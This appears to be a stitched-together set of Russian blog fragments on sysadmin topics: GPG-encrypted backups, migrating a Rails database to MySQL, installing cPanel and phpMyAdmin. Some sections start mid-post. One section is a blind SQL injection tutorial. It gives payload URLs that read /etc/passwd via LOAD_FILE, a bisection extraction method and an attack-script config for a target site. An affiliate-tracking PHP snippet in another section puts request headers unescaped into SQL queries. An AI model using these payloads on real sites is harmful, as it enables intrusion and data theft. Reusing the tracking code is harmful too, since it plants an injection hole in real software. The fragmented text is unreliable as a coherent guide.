утилита GPG

Установка, естественно, от пользователя с root-правами.
На RedHat’ах:

yum install pgp

На Debian’ах:

apt-get install pgp

Для создания ключей все та же команда, выполнять которую можно от рядового пользователя.

gpg --gen-key

Далее понадобится экспорт ключей в текстовый файл. В командах ниже username@email, разумеется, надо заменить на почту указанную при генерации.

Экспорт публичного ключа:

gpg --output public.pgp --armor --export username@email

Экспорт закрытого (приватного) ключа:

gpg --output private.pgp --armor --export-secret-key username@email

Если требуется, после экспорта ключей их можно удалить. Сначала удаляется закрытый ключ:

gpg --delete-secret-keys username@email

Затем открытый:

gpg --delete-keys username@email

Вывести список всех импортированных ключей:

gpg --list-keys

gem backup и PGP-ключ

Установка гема:

gem install backup

Cоздание модели (в данном примере модель называется ekzample) для бекапа:

backup generate:model --trigger ekzample
Generated model file: '~/Backup/models/ekzample.rb'.

Далее, для настройки нужного бекапа, следует отредактировать ~/Backup/models/ekzample.rb.

В примере ниже показан конфиг для резервного копирования базы MySQL с последующим сжатием в tar и шифрованием архива PGP-ключом, после чего зашифрованный файл отправляется по SFTP на бекап-сервер.

# encoding: utf-8
 
##
# Backup Generated: ekzample
# Once configured, you can run the backup with the following command:
#
# $ backup perform -t ekzample [-c <path_to_configuration_file>]
#
# For more information about Backup's components, see the documentation at:
# http://backup.github.io/backup
#
Model.new(:ekzample, 'Description for ekzample') do
 
  split_into_chunks_of 500
 
  Encryptor::GPG.defaults do |encryption|
    encryption.keys = {}
    encryption.keys['username@email'] = <<-KEY
      -----BEGIN PGP PUBLIC KEY BLOCK-----
      ...it is place for PUBLIC KEY...
      -----END PGP PUBLIC KEY BLOCK----
    KEY
    encryption.recipients = 'username@email'
  end
 
  database MySQL do |db|
    db.name  = 'exampledb'
    db.username = 'exampleuser'
    db.password = 'examplepass'
  end
 
  compress_with Gzip
  encrypt_with GPG
 
  store_with SFTP do |server|
    server.username = 'backupuser'
    server.password = 'backuppass'
    server.ip       = '111.111.111.111'
    server.port     = 22
    server.path     = '~/'
    # Use a number or a Time object to specify how many backups to keep.
    server.keep     = 150
 
    # Additional options for the SSH connection.
    # server.ssh_options = {}
  end
 
end

Не стоит забывать вставить между <<-KEY и KEY созданный ранее ПУБЛИЧНЫЙ (открытый) ключ.

Для более тонкой настройки PGP-ключей, например, разные ключи для разных баз, следует воспользоваться официальной документацией.

Запускается создание бекапа командой:

backup perform -t ekzample

извлечение бекапа

Если в системе нет ключей, используемых данным бекапом, следует их импортировать:

gpg --import private.pgp
gpg --import public.gpg

Далее чтобы расшифровать резервную копию понадобится команда:

gpg -o ekzample.tar -d ekzample.tar.gpg

Для распаковки тарбола подойдет команда:

tar -xvf ekzample.tar

экспорт БД с sqlite3

Прежде всего надо как-то сдампить старую БД на SQLite и хотелось бы это сделать без писания дополнительных скриптов. Для этого делаем нижеизложенное.
Закидываем в Gemfile следующую строку:

gem 'yaml_db'

И далее установим этот гем через bundle:

# cd rails_app && bundle install

Этот гем даст некоторые новые rake’и для работы с БД:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

$ rake -T
...
rake db:create          # Create the database from ...
rake db:data:dump       # Dump contents of database ...
rake db:data:dump_dir   # Dump contents of database ...
rake db:data:load       # Load contents of db/data...
rake db:data:load_dir   # Load contents of db/data_dir ...
rake db:drop            # Drops the database for the ...
rake db:dump            # Dump schema and data to db/...
rake db:fixtures:load   # Load fixtures into the current...
rake db:load            # Load schema and data from ...
rake db:migrate         # Migrate the database (options:...
rake db:migrate:status  # Display status of migrations
rake db:rollback        # Rolls the schema back to ...
rake db:schema:dump     # Create a db/schema.rb file ...
rake db:schema:load     # Load a schema.rb file into...
rake db:seed            # Load the seed data from...
rake db:setup           # Create the database, load...
rake db:structure:dump  # Dump the database structure...
rake db:version
...

Далее нижеприведенной командой экспортируем схему и содержание БД в db/data.yml.

$ rake db:dump

Если БД слишком разрослась, можно попробывать вариант с rake db:data:dump_dir.

поднимаем и настраиваем MySQL

MySQL

Сразу же устанавливаем пакеты:

# yum install mysql mysql-server mysql-devel ruby-mysql -y

Далее прописываем во все тот же Gemfile:

gem 'mysql2'

И опять бандлим:

# bundle install

Стартуем сервер MySQL.

# service mysqld start

Заходим под рутом в MySQL:

mysql -uroot -p

Если до этого руту был задан пароль, то его надо будет ввести, если это первый заход рута, то пароль пустой.
А теперь создаем базу

mysql> CREATE DATABASE railsdb CHARACTER SET utf8 COLLATE utf8_general_ci;

и пользователя, попутно назначая ему права на эту БД.

mysql> GRANT ALL PRIVILEGES ON railsdb.* TO 'railsuser'@'localhost' IDENTIFIED BY 'railspass' WITH GRANT OPTION;

Команда выше дает права пользователю railsuser с паролем railspass на полный доступ к БД railsdb c локального хоста. Подробнее о правах и как их назначить читаем на оффсайте.

настройка rails-приложения

Открываем config/database.yml и заменяем настройки БД нужной секции на подобные (в моем случае это development):

1
2
3
4
5
6
7
8
9

development:
  adapter: mysql2
  encoding: utf8
  reconnect: false
  database: railsdb
  pool: 5
  username: railsuser
  password: railspass
  host: localhost

Хочу предупредить, что табуляция перед параметрами, видимо, очень важна т.к. без этих табов сервер не стартанул, а с ними запустился на ура.
Теперь импортируем схему и данные в БД.

$ rake db:load

Стоит помнить, что команда загрузки дампа может быть и немного иной, все зависит от того какую команду экспорта дампа выбирали вы в на первом шаге этого поста. Ну вот и все.

Первый скрипт долгий т.к. однопоточный, зато точный т.е. стопудов однозначно вычислит символ до которого дошел. Второй многопоточный, иногда немного недовычисляет при частых обрывах сети, однако допустим для вычисления текста файла функцией MySQL LOAD_FILE в самый раз т.к. гораздо быстрее обработает длинный текст, а не досчитанные символы можно самому догадатся или же пробежатся по ним первым скриптом.

Аналогов, наверное, существует немерянно, но несмотря на это, я думаю, что мои скрипты обладают отличным преймуществом – они очень гибкие т.к. примитивны и в них очень легко разобратся.

Что такое SQL-inj, в том числе и слепая скуля, как с ними быть и многое другое, на мой взгляд лучше всего описано в этом FAQ на rdot’е.

скачать скрипт

Как вы понимаете, если у вас слепая инъекция, то никаких прямых выводов на страницу не может быть. Вы задаете какой-либо предикат, а проще говоря, условие, например

128>ASCII(MID(LOAD_FILE('/etc/passwd'),1,1))

и в соответсвии с этим условием у вас отобразится, например, либо новость под номером 10, либо 9. Приведу пример полного запроса:

http://site.com/?id=IF(128>ASCII(MID(LOAD_FILE('/etc/passwd'),1,1)),10,9) --

ну или так:

http://site.com/?id=10 AND 128>ASCII(MID(LOAD_FILE('/etc/passwd'),1,1)) --


В первом примере, если 128 больше ASCII-кода первого символа файла /etc/passwd, то выведется страница с новостью 10, в противном случае, выведется 9. Второй случай практически идентичен первому, заисключением того, что если не больше ASCII-кода, то выведется неизвестно какая страница (для каждого сайта индивидуально, надо просто попробывать запрос http://site.com/?id= ), скорее всего это будет редирект на главную.

Вообще существует достаточно много всяких способов раксрутки слепых скулей, не только по странице, которую мы получаем на выводе. Короче читаем FAQ, ссылка на которую указана выше.

Так вот скрипт, берет допустим первый символ и формирует такой запрос:

128>=ASCII(MID(LOAD_FILE('/etc/passwd'),0,1))

если условие верно т.е. открылась страница с новостью 10, значит 128>=ASCII>=0, тогда скрипт делает запрос

64>=ASCII(MID(LOAD_FILE('/etc/passwd'),0,1)) – верно

32>=ASCII(MID(LOAD_FILE('/etc/passwd'),0,1)) – неверно

тогда следующий запрос, будет отталкиватся от кода 48 (48=32+32/2)

48>=ASCII(MID(LOAD_FILE('/etc/passwd'),0,1)) – верно

тогда вычитаем 8 (на прошлом ходе прибавляли 16, на каждом шаге делем на 2)

40>=ASCII(MID(LOAD_FILE('/etc/passwd'),0,1)) – неверно

44>=ASCII(MID(LOAD_FILE('/etc/passwd'),0,1)) – верно

42>=ASCII(MID(LOAD_FILE('/etc/passwd'),0,1)) – верно

41>=ASCII(MID(LOAD_FILE('/etc/passwd'),0,1)) – неверно

42=ASCII(MID(LOAD_FILE('/etc/passwd'),0,1)) – верно

таким образом мы за 9 шагов однозначно определили символ.

Далее скрипт берет следующий символ и начинает все заново.

128>=ASCII(MID(LOAD_FILE('/etc/passwd'),1,1))

Я не читал, все статьи по blind SQL-inj, поэтому если кто-то придумал такой перебор раньше меня, а так наверняка оно и есть, не обижайтесь, что здесь нет ссылки на вышу статью и укажите ее в комментариях.

Все разгаданные символы скрипт записывает в файл и выводит на экран консоли.

Она располагается в начале скрипте и представляет из себя инициализацию глобальных переменных.

#config
$request="/article.php?id=44+AND+##NUM####SIGN##ASCII%28MID%28##REPLACE##,##I##,1%29%29"
$outfile="outfile"
$priznak="eta_kartinka_est_tolko_v_statie_s_nomerom_44.jpg"
$func="LOAD_FILE%28"+"0x2f6574632f706173737764"+"%29" #/etc/passwd
$site="www.site.com"
$start=1
#config

$request – сам запрос, с метками:

• ##NUM## – число с которым сравнивается ASCII-код
• ##SIGN## – место, куда будет подставляться знак (>,=)
• ##REPLACE## – сама функция, задающаяся в переменной $func
• ##I## – номер символа

Задаем эту переменную в соответствии с нашим запросом, при этом правильно расставляем метки.

$outfile - файл куда будет все выводится.
$priznak – часть страницы, отличающая страницу с верным выводом от неверной. Т.е. при таком виде запроса

http://site.com/?id=10 AND 128>ASCII(MID(LOAD_FILE('/etc/passwd'),1,1)) --

или

http://site.com/?id=IF(128>ASCII(MID(LOAD_FILE('/etc/passwd'),1,1)),10,9) --

эта часть текста HTML должна присутствовать только в новости с индексом 10.

$func – функция, которую мы вызываем. Это может быть LOAD_FILE(), VERSION(), USER() итд, комбинации из них, короче все на что хватит фантазии.

$site – сайт, где располагается SQL-inj.

$start – номер символа, с которого начинать.

скачать скрипт

Принцип работы нечем не отличается, заисключением того, что скрипт вычисляет не последовательно символ за символом, а сразу паралельно несколько символов, количество которых равно количеству потоков заданных в конфигурации.

Конфигурация, такая же, добавился лишь один параметр $th_count. Он определяет количество потоков.

Чем же плох многопоточный вариант? При стабильном соединении с интернетом не чем т.е. он вычислит все символы как надо и быстро. Если же соединение часто обрывается, как например на 3G-модемах, то некоторые потоки будут умерать оставляя свой символ недовычисленным. Для примера, при нестабильном соединении (скорость скачет от 1КБ/с до 300КБ/с, соединение обрывается каждые 3-5 минут) из 10 символов 1 будет недовычислен.

Представляет она из себя набор PHP скриптов. Основная часть предназначена для партнера, там отображается его статистика, баланс и промо. Вторая часть вставляется в страницу(ы) для, которых предназначена ПП. Так же в комплект входят SQL-код для создания необходимой для CMS БД.

Скачать это чудо экстремального программирования можно здесь.

Установка

Ничего не может быть проще чем установка этой CMS.

1. После того, как вы распаковали архив, закидываем все что там было на сервер, разумеется кроме файлов readme и sql.sql.
2. Внимательно читаем readme, даем почитать его всем своим друзьям и подругам, а так же родителям читаем вслух, после чего удаляем.
3. Открываем sql.sql и создаем БД в MySQL точно в соответствии с запросами в этом файле, или же можно просто импортировать его в БД, посредством phpMyAdmin.
4. Теперь открываем исходный код страниц ПП, по которым будет учитыватся траф и вставляем туда такой код
   
include "partner/config.php"; //относительная ссылка на config.php
if(isset($_GET['r'])){
$r=(integer)$_GET['r'];
$ip=$_SERVER['HTTP_X_REAL_IP'];
$ref=$_SERVER['HTTP_REFERER'];
if (strlen($ref)<1) $ref=" - "; $cost=0.00; $bd=new mysqli($bd_host,$bd_user,$bd_pass,$bd_name); $res=$bd->query("SELECT cost FROM seller WHERE r=$r;");
while($row=$res->fetch_row()){
$cost=(float)$row[0];
}
$now_date=date('Y-m-d');
$hash=md5($now_date.$ip);
$exist=false;
$res=$bd->query("SELECT uniq_hash FROM traf WHERE uniq_hash='$hash';");
while($row=$res->fetch_row()){
if (strlen($row[0])>1)$exist=true;
}
$pay=0;
if (!$exist) $bd->query("INSERT INTO traf VALUES (NULL, $r,'$ip','$ref','$now_date',$pay,$cost,'$hash');");
$res->free();
$bd->close();
}


Конфигурация

Когда я в прошлом абзаце сказал, что не может быть ничего проще установки, я соврал – конфигурирование гораздо проще.

Открываем config.php и видим там

// параметры БД
$bd_host="localhost";
$bd_user="bd_user";
$bd_pass="bd_pass";
$bd_name="bd_name";
//-----------------------
$unikey=md5("universal_key"); //универсальный ключ
$site_name_partner="your PP name"; //заголовок ПП
$default_partner_cost=0.00; //стоимость клика по умолчанию
$admin_contacts="icq: 000000"; //контакты администрации

Я думаю тут все предельно просто, объяснить следует лишь переменную $unikey. Дело в том, что в этой CMS нет админки, зато есть универсальный ключ равный $unikey. Админ зная почту какого-либо пользователя может зайти в его аккаунт посредством уникея и там посмотреть его баланс, статистику итд.

Возможно вы хотите меня спросить: “Если админ знает почту аккаунта, посмотрев ее в БД, почему же он не сможет посмотреть там пароль от его акка?”, а я вам отвечу – т.к. в БД хранятся только md5-хэши паролей.

Так же вам скорее всего придется поменять логотип ПП (img/logo.png), дизайн (screen.css) и правила ПП (partner_rules.pdf).

По всем вопросам обращайтесь сюда. Если этот ‘движок’ будет кому-нибудь интересен, включая меня, вполне вероятно, что он начнет развиватся.

В итоге cPanel оказалась платным системным приложением, поэтому я и скачал триальную версию с оффсайта cpanel.net.

Скачав, бинарный файл cpanel-universal-install.sea, я начал ее устанавливать:

# ./cpanel-universal-install.sea

Инсталяция продлилась около полуторачаса. В итоге на сервере cPanel затерла все мои предыдущие труды, а точнее MySQL и phpMyAdmin и конфигурацию Apache. Я, как и большинство не читаю мануалы, тем более если они на английском, поэтому набрав в браузере ip сервера и увидев страницу ошибки cPanel, я немного смутился т.к. ожидал там увидеть что-то наподобе завершения конфигурации cPanel. Опытным путем я выяснил, что заходить надо по адресу ip-сервера:port, где port – номер порта, указанного в файле конфигурации /var/cpanel/cpanel.config.

По умолчанию логин и пароль администратора cPanel – cpanel:<пароль root сервера>.

Зайдя в панель, не сложно догадатся, что далее следует пройти в WHM, где можно создать пользователя и многое другое. И там я попытался создать БД, однако в место этого увидел ошибку, мол соединится с БД не реально.

В итоге выяснилось что от моей MySQL и phpMyAdmin остались только конфиги в /etc. По непонятным причинам репозитарии YUM, где были пакеты с MySQL и phpMyAdmin резко стали недоступны. Но я не стал горевать, а скачал тарболы с оффсайта.

MySQL – http://www.mysql.ru

phpMyAdmin – http://www.phpmyadmin.net

Установка MySQL из тарбола:

# tar xzf mysql-version.tar.gz //распаковываем архив
# ./configure //конфигурируем и компилируем
# make && make install
# scripts/mysql_install_db
# chmod a+x support-files/mysql.server //ставим права на исполнение
# support-files/mysql.server start //запускаем mysql-сервер
# /usr/local/bin/mysqladmin -u root password 'new-pass' //устанавливаем рутовский пароль

Установка phpMyAdmin – примитивна до нельзя:

1. качаем архив и распаковываем его в папку /usr/local/cpanel/base/3rdparty/phpMyAdmin,
2. в файле /etc/phpMyAdmin/config.inc.php прописываем наш админский пароль, хост и прочее.

И тут у вас может возникнуть резонный вопрос: если мы не устанавливали phpMyAdmin а просто распокавали его тарбол каким таким образом в /etc нарисуется его конфиг. Я отвечу многозначительным молчанием т.к. у меня конфиг там остался от первой установки.

/etc/phpMyAdmin/config.inc.php
/**
* phpMyAdmin configuration file, you can use it as base for the manual
* configuration. For easier setup you can use "setup/".
*
* All directives are explained in Documentation.html and on phpMyAdmin
* wiki .
*/
//
/*
* This is needed for cookie based authentication to encrypt password in
* cookie
*/
$cfg['blowfish_secret'] = ''; /* YOU MUST FILL IN THIS FOR COOKIE AUTH! */
/**
* Server(s) configuration
*/
$i = 0;
// The $cfg['Servers'] array starts with $cfg['Servers'][1]. Do not use
// $cfg['Servers'][0]. You can disable a server config entry by setting host
// to ''. If you want more than one server, just copy following section
// (including $i incrementation) serveral times. There is no need to define
// full server array, just define values you need to change.
$i++;
$cfg['Servers'][$i]['host'] = 'localhost'; // MySQL hostname or IP address
$cfg['Servers'][$i]['port'] = ''; // MySQL port - leave blank for default port
$cfg['Servers'][$i]['socket'] = ''; // Path to the socket - leave blank for default socket
$cfg['Servers'][$i]['connect_type'] = 'tcp'; // How to connect to MySQL server ('tcp' or 'socket')
$cfg['Servers'][$i]['extension'] = 'mysqli'; // The php MySQL extension to use ('mysql' or 'mysqli')
$cfg['Servers'][$i]['compress'] = FALSE; // Use compressed protocol for the MySQL connection
// (requires PHP >= 4.3.0)
$cfg['Servers'][$i]['controluser'] = 'root'; // MySQL control user settings
// (this user must have read-only
$cfg['Servers'][$i]['controlpass'] = 'new-password'; // access to the "mysql/user"
// and "mysql/db" tables).
// The controluser is also
// used for all relational
// features (pmadb)
$cfg['Servers'][$i]['auth_type'] = 'http'; // Authentication method (config, http or cookie based)?
$cfg['Servers'][$i]['user'] = 'root'; // MySQL user
$cfg['Servers'][$i]['password'] = 'new-password'; // MySQL password (only needed
// with 'config' auth_type)
$cfg['Servers'][$i]['only_db'] = ''; // If set to a db-name, only
// this db is displayed in left frame
// It may also be an array of db-names, where sorting order is relevant.
$cfg['Servers'][$i]['hide_db'] = ''; // Database name to be hidden from listings
$cfg['Servers'][$i]['verbose'] = ''; // Verbose name for this host - leave blank to show the hostname
$cfg['Servers'][$i]['pmadb'] = ''; // Database used for Relation, Bookmark and PDF Features
// (see scripts/create_tables.sql)
// - leave blank for no support
// DEFAULT: 'phpmyadmin'
$cfg['Servers'][$i]['bookmarktable'] = ''; // Bookmark table
// - leave blank for no bookmark support
// DEFAULT: 'pma_bookmark'
$cfg['Servers'][$i]['relation'] = ''; // table to describe the relation between links (see doc)
// - leave blank for no relation-links support
// DEFAULT: 'pma_relation'
$cfg['Servers'][$i]['table_info'] = ''; // table to describe the display fields
// - leave blank for no display fields support
// DEFAULT: 'pma_table_info'
$cfg['Servers'][$i]['table_coords'] = ''; // table to describe the tables position for the PDF schema
// - leave blank for no PDF schema support
// DEFAULT: 'pma_table_coords'
$cfg['Servers'][$i]['pdf_pages'] = ''; // table to describe pages of relationpdf
// - leave blank if you don't want to use this
// DEFAULT: 'pma_pdf_pages'
$cfg['Servers'][$i]['column_info'] = ''; // table to store column information
// - leave blank for no column comments/mime types
// DEFAULT: 'pma_column_info'
$cfg['Servers'][$i]['history'] = ''; // table to store SQL history
// - leave blank for no SQL query history
// DEFAULT: 'pma_history'
$cfg['Servers'][$i]['verbose_check'] = TRUE; // set to FALSE if you know that your pma_* tables
// are up to date. This prevents compatibility
// checks and thereby increases performance.
$cfg['Servers'][$i]['AllowRoot'] = TRUE; // whether to allow root login
$cfg['Servers'][$i]['AllowDeny']['order'] // Host authentication order, leave blank to not use
= '';
$cfg['Servers'][$i]['AllowDeny']['rules'] // Host authentication rules, leave blank for defaults
= array();
$cfg['Servers'][$i]['AllowNoPassword'] // Allow logins without a password. Do not change the FALSE
= FALSE; // default unless you're running a passwordless MySQL server
$cfg['Servers'][$i]['designer_coords'] // Leave blank (default) for no Designer support, otherwise
= ''; // set to suggested 'pma_designer_coords' if really needed
$cfg['Servers'][$i]['bs_garbage_threshold'] // Blobstreaming: Recommented default value from upstream
= 50; // DEFAULT: '50'
$cfg['Servers'][$i]['bs_repository_threshold'] // Blobstreaming: Recommented default value from upstream
= '32M'; // DEFAULT: '32M'
$cfg['Servers'][$i]['bs_temp_blob_timeout'] // Blobstreaming: Recommented default value from upstream
= 600; // DEFAULT: '600'
$cfg['Servers'][$i]['bs_temp_log_threshold'] // Blobstreaming: Recommented default value from upstream
= '32M'; // DEFAULT: '32M'
/*
* End of servers configuration
*/
/*
* Directories for saving/loading files from server
*/
$cfg['UploadDir'] = '/var/lib/phpMyAdmin/upload';
$cfg['SaveDir'] = '/var/lib/phpMyAdmin/save';
?>
Справедливости ради стоит отметить что в этой версии cPanel (а на сегодняшний день это последняя версия), в ней установлен phpPgAdmin, при этом PostegeSQL установлена не была.

И в конце, на правах рекламы и благодарности скажу, что все эти опыты проводились на VPS любезно подаренной мне хостингом ‘Макхост ‘. А так же хочу отметить, что если бы я не был таким дураком и нормально просмотрел меню virtuozzo power panel (интерфейс к которой по умолчанию предоставляет Макхост для управления VPS), то заметил бы такую штуку как ‘контейнеры’, судя по всему в которой можно было бы без гемороя установить какой-нибудь бесплатный аналог cPanel’е.